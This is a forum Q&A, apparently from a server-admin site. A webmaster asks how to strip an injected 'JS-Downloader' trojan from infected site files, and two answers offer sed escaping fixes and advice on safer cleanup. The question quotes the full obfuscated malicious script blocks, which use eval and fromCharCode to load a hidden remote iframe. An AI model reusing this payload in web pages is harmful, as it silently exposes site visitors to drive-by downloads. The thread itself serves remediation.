0

Possible Duplicate:
My server's been hacked EMERGENCY

In our web-server most of the sites are infected with this JS-Downloader Trojan. It injected the following code. I've tried to clean up the server with "linux malware detector" and ClamAV, but both of them failed to clean it up. Any suggestion how to clean this up? Do I need to run a script to clean it? I've written this script. But it's not able to clean.

while read -r file
do
   sed -i '/<script>var s,g=2,aa=document.createTextNode("harCode");if(~0===Math.cos(Math.PI)){s=String["fr"+"omC"+aa.nodeValue];} eval(s(7+g,7+g,103+g,100+g,30+g,38+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,39+g,121+g,7+g,7+g,7+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,57+g,7+g,7+g,123+g,30+g,99+g,106+g,113+g,99+g,30+g,121+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,117+g,112+g,103+g,114+g,99+g,38+g,32+g,58+g,103+g,100+g,112+g,95+g,107+g,99+g,30+g,113+g,112+g,97+g,59+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,30+g,117+g,103+g,98+g,114+g,102+g,59+g,37+g,47+g,46+g,37+g,30+g,102+g,99+g,103+g,101+g,102+g,114+g,59+g,37+g,47+g,46+g,37+g,30+g,113+g,114+g,119+g,106+g,99+g,59+g,37+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,56+g,102+g,103+g,98+g,98+g,99+g,108+g,57+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,56+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,57+g,106+g,99+g,100+g,114+g,56+g,46+g,57+g,114+g,109+g,110+g,56+g,46+g,57+g,37+g,60+g,58+g,45+g,103+g,100+g,112+g,95+g,107+g,99+g,60+g,32+g,39+g,57+g,7+g,7+g,123+g,7+g,7+g,100+g,115+g,108+g,97+g,114+g,103+g,109+g,108+g,30+g,103+g,100+g,112+g,95+g,107+g,99+g,112+g,38+g,39+g,121+g,7+g,7+g,7+g,116+g,95+g,112+g,30+g,100+g,30+g,59+g,30+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,97+g,112+g,99+g,95+g,114+g,99+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,38+g,37+g,103+g,100+g,112+g,95+g,107+g,99+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,113+g,112+g,97+g,37+g,42+g,37+g,102+g,114+g,114+g,110+g,56+g,45+g,45+g,108+g,114+g,43+g,113+g,114+g,95+g,114+g,113+g,44+g,97+g,109+g,44+g,114+g,116+g,45+g,97+g,109+g,115+g,108+g,114+g,99+g,112+g,44+g,102+g,114+g,107+g,37+g,39+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,116+g,103+g,113+g,103+g,96+g,103+g,106+g,103+g,114+g,119+g,59+g,37+g,102+g,103+g,98+g,98+g,99+g,108+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,110+g,109+g,113+g,103+g,114+g,103+g,109+g,108+g,59+g,37+g,95+g,96+g,113+g,109+g,106+g,115+g,114+g,99+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,106+g,99+g,100+g,114+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,114+g,119+g,106+g,99+g,44+g,114+g,109+g,110+g,59+g,37+g,46+g,37+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,117+g,103+g,98+g,114+g,102+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,100+g,44+g,113+g,99+g,114+g,63+g,114+g,114+g,112+g,103+g,96+g,115+g,114+g,99+g,38+g,37+g,102+g,99+g,103+g,101+g,102+g,114+g,37+g,42+g,37+g,47+g,46+g,37+g,39+g,57+g,7+g,7+g,7+g,98+g,109+g,97+g,115+g,107+g,99+g,108+g,114+g,44+g,101+g,99+g,114+g,67+g,106+g,99+g,107+g,99+g,108+g,114+g,113+g,64+g,119+g,82+g,95+g,101+g,76+g,95+g,107+g,99+g,38+g,37+g,96+g,109+g,98+g,119+g,37+g,39+g,89+g,46+g,91+g,44+g,95+g,110+g,110+g,99+g,108+g,98+g,65+g,102+g,103+g,106+g,98+g,38+g,100+g,39+g,57+g,7+g,7+g,123+g));</script><script>var s,d1=new Date(),d2=new Date(d1.getTime()+2),o=d1-d2,aa=document.createTextNode("eval");e=window[aa.nodeValue];e(String.fromCharCode(11+o,11+o,107+o,104+o,34+o,42+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,43+o,125+o,11+o,11+o,11+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,61+o,11+o,11+o,127+o,34+o,103+o,110+o,117+o,103+o,34+o,125+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,121+o,116+o,107+o,118+o,103+o,42+o,36+o,62+o,107+o,104+o,116+o,99+o,111+o,103+o,34+o,117+o,116+o,101+o,63+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,34+o,121+o,107+o,102+o,118+o,106+o,63+o,41+o,51+o,50+o,41+o,34+o,106+o,103+o,107+o,105+o,106+o,118+o,63+o,41+o,51+o,50+o,41+o,34+o,117+o,118+o,123+o,110+o,103+o,63+o,41+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,60+o,106+o,107+o,102+o,102+o,103+o,112+o,61+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,60+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,61+o,110+o,103+o,104+o,118+o,60+o,50+o,61+o,118+o,113+o,114+o,60+o,50+o,61+o,41+o,64+o,62+o,49+o,107+o,104+o,116+o,99+o,111+o,103+o,64+o,36+o,43+o,61+o,11+o,11+o,127+o,11+o,11+o,104+o,119+o,112+o,101+o,118+o,107+o,113+o,112+o,34+o,107+o,104+o,116+o,99+o,111+o,103+o,116+o,42+o,43+o,125+o,11+o,11+o,11+o,120+o,99+o,116+o,34+o,104+o,34+o,63+o,34+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,101+o,116+o,103+o,99+o,118+o,103+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,42+o,41+o,107+o,104+o,116+o,99+o,111+o,103+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,117+o,116+o,101+o,41+o,46+o,41+o,106+o,118+o,118+o,114+o,60+o,49+o,49+o,101+o,113+o,47+o,117+o,118+o,99+o,118+o,117+o,48+o,101+o,113+o,48+o,100+o,103+o,49+o,117+o,118+o,99+o,118+o,107+o,117+o,118+o,107+o,101+o,48+o,106+o,118+o,111+o,41+o,43+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,120+o,107+o,117+o,107+o,100+o,107+o,110+o,107+o,118+o,123+o,63+o,41+o,106+o,107+o,102+o,102+o,103+o,112+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,114+o,113+o,117+o,107+o,118+o,107+o,113+o,112+o,63+o,41+o,99+o,100+o,117+o,113+o,110+o,119+o,118+o,103+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,110+o,103+o,104+o,118+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,118+o,123+o,110+o,103+o,48+o,118+o,113+o,114+o,63+o,41+o,50+o,41+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,121+o,107+o,102+o,118+o,106+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,104+o,48+o,117+o,103+o,118+o,67+o,118+o,118+o,116+o,107+o,100+o,119+o,118+o,103+o,42+o,41+o,106+o,103+o,107+o,105+o,106+o,118+o,41+o,46+o,41+o,51+o,50+o,41+o,43+o,61+o,11+o,11+o,11+o,102+o,113+o,101+o,119+o,111+o,103+o,112+o,118+o,48+o,105+o,103+o,118+o,71+o,110+o,103+o,111+o,103+o,112+o,118+o,117+o,68+o,123+o,86+o,99+o,105+o,80+o,99+o,111+o,103+o,42+o,41+o,100+o,113+o,102+o,123+o,41+o,43+o,93+o,50+o,95+o,48+o,99+o,114+o,114+o,103+o,112+o,102+o,69+o,106+o,107+o,110+o,102+o,42+o,104+o,43+o,61+o,11+o,11+o,127+o));</script></body>/d' $file
done< <(find . -name '*.htm' -o -name '*.html' -o -name '*.js' -o -name '*.php')
Community
  • 1
Minhaj
  • 177
  • 2
  • 14

2 Answers2

1

"<",">" and some other characters you have used are control characters in sed and must be escaped. Try something like this for the sed expression, it might work better :

"s/\<script\>.*\(\"harCode\"\).*\/script\>.*\/body\>//g"
O G
  • 854
  • 4
  • 6
1

I would advise against modifying with a regular expression. It's very easy to destroy legitimate script tags. Use an html parser instead. Perhaps HTML::TreeBuilder.

However, if you're set on doing this with a regex, do the following:

  • make a backup of your original files ( infected as they are )
  • run the script that will clean them
  • do a diff of each file against the original ones, and make sure that the only things that got modified are the malicious script tags
Geo
  • 157
  • 7